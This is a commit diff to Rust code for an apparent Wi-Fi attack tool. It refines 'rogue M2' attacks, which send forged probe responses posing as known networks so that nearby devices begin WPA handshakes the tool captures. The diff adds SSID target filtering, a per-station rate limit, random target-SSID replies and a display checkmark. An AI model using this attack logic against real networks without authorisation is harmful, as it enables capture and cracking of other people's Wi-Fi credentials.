Improve rogue-attack logic and status info

Author: Ragnt

src/attack.rs

@@ -1,11 +1,15 @@
 // Attack! //
 
-use std::os::fd::AsRawFd;
+use std::{
+    os::fd::AsRawFd,
+    time::{Duration, SystemTime},
+};
 
 use libwifi::frame::{
     components::{MacAddress, RsnCipherSuite},
     DeauthenticationReason, ProbeRequest,
 };
+use rand::seq::SliceRandom;
 
 use crate::{
     status::{MessageType, StatusMessage},
@@ -333,13 +337,22 @@ pub fn rogue_m2_attack_directed(
     }
     let ssid = probe.station_info.ssid.unwrap();
 
+    // Check SSID against SSID targets
+    if !oxide.stargets.is_empty() && !oxide.stargets.contains(&ssid) {
+        return Ok(());
+    }
+
     // Grab the station from our unnasoc. clients list.
     let station = if let Some(dev) = oxide.unassoc_clients.get_device(&probe.header.address_2) {
         dev
     } else {
         return Ok(());
     };
 
+    if station.timer_interact.elapsed().unwrap() < Duration::from_secs(3) {
+        return Ok(());
+    }
+
     // If we have an AP for this SSID, we will use as many of the same details as possible
     if let Some(ap) = oxide.access_points.get_device_by_ssid(&ssid) {
         // Make sure this AP is a target and that this AP is
@@ -361,6 +374,7 @@ pub fn rogue_m2_attack_directed(
         );
         write_packet(oxide.tx_socket.as_raw_fd(), &frx)?;
         station.interactions += 1;
+        station.timer_interact = SystemTime::now();
         oxide.status_log.add_message(StatusMessage::new(
             MessageType::Info,
             format!("Direct Rogue AP Attack: {} ({})", station.mac_address, ssid),
@@ -389,86 +403,87 @@ pub fn rogue_m2_attack_undirected(
         return Ok(());
     };
 
+    if station.timer_interact.elapsed().unwrap() < Duration::from_secs(3) {
+        return Ok(());
+    }
+
     if let Some(ssid) = probe.station_info.ssid {
-        // In this case we have an SSID to send, which is good. If we have a target deck, and the SSID matches the SSID we have for that AP (in the target deck) then we send a response.
-        if !oxide.targets.is_empty() {
-            // We have a target deck
-            if let Some(ap) = oxide.access_points.get_device_by_ssid(&ssid) {
-                // AP exists
-
-                // Does the target deck contain our AP?
-                if !oxide.targets.contains(&ap.mac_address) {
-                    return Ok(());
-                }
-
-                // Do we already have a rogue-M2 from this station?
-                if station.has_rogue_m2 {
-                    return Ok(());
-                }
-
-                let frx = build_probe_response(
-                    &probe.header.address_2,
-                    &oxide.rogue_client,
-                    &ssid,
-                    oxide.counters.sequence3(),
-                    oxide.current_channel.get_channel_number(),
-                );
-                write_packet(oxide.tx_socket.as_raw_fd(), &frx)?;
-                station.interactions += 1;
-                oxide.status_log.add_message(StatusMessage::new(
-                    MessageType::Info,
-                    format!(
-                        "Indirect Rogue AP Attack: {} ({})",
-                        station.mac_address, ssid
-                    ),
-                ));
-            }
-        } else {
-            // no targets, just send a probe with the SSID back.
+        // Target validation stuff
+        let mut target_checks = false;
+        let mut is_target = false;
+
+        if !oxide.targets.is_empty() || !oxide.stargets.is_empty() {
+            target_checks = true;
+        }
+
+        // Is the AP the SSID belongs to (based on our survey) in our MAC Targets?
+        if oxide
+            .access_points
+            .get_device_by_ssid(&ssid)
+            .is_some_and(|ap| oxide.targets.contains(&ap.mac_address))
+        {
+            is_target = true;
+        }
+
+        // Is the SSID in our stargets?
+        if oxide.stargets.contains(&ssid) {
+            is_target = true;
+        }
+
+        // Both checks fail, we shouldn't persue this.
+        if target_checks && !is_target {
+            return Ok(());
+        }
+
+        // Do we already have a rogue-M2 from this station (for this SSID)
+        if station.rogue_actions.get(&ssid).is_some_and(|f| *f) {
+            return Ok(());
+        }
+
+        let frx = build_probe_response(
+            &probe.header.address_2,
+            &oxide.rogue_client,
+            &ssid,
+            oxide.counters.sequence3(),
+            oxide.current_channel.get_channel_number(),
+        );
+        write_packet(oxide.tx_socket.as_raw_fd(), &frx)?;
+        station.interactions += 1;
+        station.timer_interact = SystemTime::now();
+        oxide.status_log.add_message(StatusMessage::new(
+            MessageType::Info,
+            format!(
+                "Indirect Rogue AP Attack: {} ({})",
+                station.mac_address, ssid
+            ),
+        ));
+    } else {
+        // We don't want to nest this...
+        if !oxide.stargets.is_empty() {
+            // Pick a random SSID from our targets and respond.
+            let target = &oxide
+                .stargets
+                .choose(&mut rand::thread_rng())
+                .unwrap_or(return Ok(()));
+
             let frx = build_probe_response(
                 &probe.header.address_2,
                 &oxide.rogue_client,
-                &ssid,
+                target,
                 oxide.counters.sequence3(),
                 oxide.current_channel.get_channel_number(),
             );
             write_packet(oxide.tx_socket.as_raw_fd(), &frx)?;
             station.interactions += 1;
+            station.timer_interact = SystemTime::now();
             oxide.status_log.add_message(StatusMessage::new(
                 MessageType::Info,
                 format!(
-                    "Indirect Rogue AP Attack: {} ({})",
-                    station.mac_address, ssid
+                    "Anonymous Rogue AP Attempt: {} ({})",
+                    station.mac_address, target
                 ),
             ));
         }
-    } else {
-        // We don't want to nest this...
-        if !oxide.targets.is_empty() {
-            // We have targets, iterate through our targets list and if we have an AP seen for the SSID we can send our own Probe Response... maybe we can force a WPA2 authentication.
-            for target in &oxide.targets {
-                if let Some(ap) = oxide.access_points.get_device(target) {
-                    if let Some(ssid) = &ap.ssid {
-                        let frx = build_probe_response(
-                            &probe.header.address_2,
-                            &oxide.rogue_client,
-                            ssid,
-                            oxide.counters.sequence3(),
-                            oxide.current_channel.get_channel_number(),
-                        );
-                        write_packet(oxide.tx_socket.as_raw_fd(), &frx)?;
-                        station.interactions += 1;
-                        oxide.status_log.add_message(StatusMessage::new(
-                            MessageType::Info,
-                            format!(
-                                "Indirect Rogue AP Attack: {} ({})",
-                                station.mac_address, ssid
-                            ),
-                        ));
-                    }
-                }
-            }
-        }
     }
 
     Ok(())

src/auth.rs

@@ -610,14 +610,13 @@ impl HandshakeStorage {
         client_mac: &MacAddress,
         new_key: EapolKey,
         essid: Option<String>,
-    ) -> Result<FourWayHandshake, &'static str> {
+    ) -> Result<&mut FourWayHandshake, &'static str> {
         let session_key = HandshakeSessionKey::new(*ap_mac, *client_mac);
 
         let handshake_list = self.handshakes.entry(session_key).or_default();
 
         // Sort the handshake list so that the most recent handshake is first.
         handshake_list.sort_by(|a, b| {
-            // Compare the timestamps in reverse order (most recent first)
             b.last_msg
                 .as_ref()
                 .map_or(std::time::SystemTime::UNIX_EPOCH, |x| x.timestamp)
@@ -628,24 +627,31 @@ impl HandshakeStorage {
                 )
         });
 
-        for handshake in &mut *handshake_list {
+        let mut index_to_return: Option<usize> = None;
+
+        for (index, handshake) in handshake_list.iter_mut().enumerate() {
             if handshake.add_key(&new_key).is_ok() {
                 handshake.mac_ap = Some(*ap_mac);
                 handshake.mac_client = Some(*client_mac);
-                handshake.essid = essid;
-                return Ok(handshake.clone());
+                handshake.essid = essid.clone();
+                index_to_return = Some(index);
+                break;
             }
         }
 
-        // If we don't find a suitable handshake, let's create a new one and add it (so we don't drop any EAPOL frames)
+        if let Some(index) = index_to_return {
+            return Ok(&mut handshake_list[index]);
+        }
+
+        // If we don't find a suitable handshake, create a new one and add it.
         let mut new_handshake = FourWayHandshake::new();
         new_handshake.add_key(&new_key)?;
         new_handshake.mac_ap = Some(*ap_mac);
         new_handshake.mac_client = Some(*client_mac);
         new_handshake.essid = essid;
-        let hs = new_handshake.clone();
-        handshake_list.push(new_handshake.clone());
-        Ok(hs)
+
+        handshake_list.push(new_handshake);
+        Ok(handshake_list.last_mut().unwrap())
     }
 
     pub fn get_table(

src/devices.rs

@@ -301,10 +301,9 @@ pub struct Station {
     pub access_point: Option<MacAddress>,
     pub aid: u16,
     pub probes: Option<Vec<String>>,
-    pub timer_auth: SystemTime,
-    pub timer_assoc: SystemTime,
-    pub timer_reassoc: SystemTime,
+    pub timer_interact: SystemTime,
     pub has_rogue_m2: bool,
+    pub rogue_actions: HashMap<String, bool>,
 }
 
 impl WiFiDeviceType for Station {}
@@ -320,10 +319,9 @@ impl Default for Station {
             access_point: None,
             aid: 0,
             probes: None,
-            timer_auth: SystemTime::now(),
-            timer_assoc: SystemTime::now(),
-            timer_reassoc: SystemTime::now(),
+            timer_interact: SystemTime::UNIX_EPOCH,
             has_rogue_m2: false,
+            rogue_actions: HashMap::new(),
         }
     }
 }
@@ -345,10 +343,9 @@ impl Station {
             access_point,
             aid: 0,
             probes: None,
-            timer_auth: SystemTime::now(),
-            timer_assoc: SystemTime::now(),
-            timer_reassoc: SystemTime::now(),
+            timer_interact: SystemTime::UNIX_EPOCH,
             has_rogue_m2: false,
+            rogue_actions: HashMap::new(),
         }
     }
 
@@ -368,10 +365,9 @@ impl Station {
             access_point: None,
             aid: 0,
             probes: Some(probes),
-            timer_auth: SystemTime::now(),
-            timer_assoc: SystemTime::now(),
-            timer_reassoc: SystemTime::now(),
+            timer_interact: SystemTime::UNIX_EPOCH,
             has_rogue_m2: false,
+            rogue_actions: HashMap::new(),
         }
     }
 
@@ -670,9 +666,19 @@ fn add_client_rows(ap_row: Vec<String>, client: &Station, last: bool) -> Vec<Str
 ///     C) We actually got the M2.
 ///
 ///  Doing this will require refactoring the probe-storage so each Station's "Probe" is actually a struct that also has a RogueM2 bool.
-fn add_probe_rows(cl_row: Vec<String>, probe: &String, last: bool) -> Vec<String> {
+fn add_probe_rows(
+    cl_row: Vec<String>,
+    probe: &String,
+    last: bool,
+    rogue_collected: bool,
+) -> Vec<String> {
     let min_length = cl_row.len();
     let icon = if last { "└ " } else { "├ " };
+    let check = if rogue_collected {
+        "\u{2714}".to_string()
+    } else {
+        " ".to_string()
+    };
 
     let mut merged = Vec::with_capacity(min_length);
 
@@ -693,7 +699,7 @@ fn add_probe_rows(cl_row: Vec<String>, probe: &String, last: bool) -> Vec<String
     merged.push(new_str);
 
     // Rogue 4
-    let new_str: String = cl_row[4].to_string();
+    let new_str: String = format!("{}\n{}", cl_row[4], check);
     merged.push(new_str);
 
     // Probes 5
@@ -796,7 +802,12 @@ impl WiFiDeviceList<Station> {
                 if let Some(probes) = &station.probes {
                     for (idx, probe) in probes.iter().enumerate() {
                         let last = idx == probes.len() - 1;
-                        let merged = add_probe_rows(cl_row, probe, last);
+                        let merged = add_probe_rows(
+                            cl_row,
+                            probe,
+                            last,
+                            station.rogue_actions.get(probe).is_some_and(|f| *f),
+                        );
                         cl_row = merged;
                         height += 1;
                     }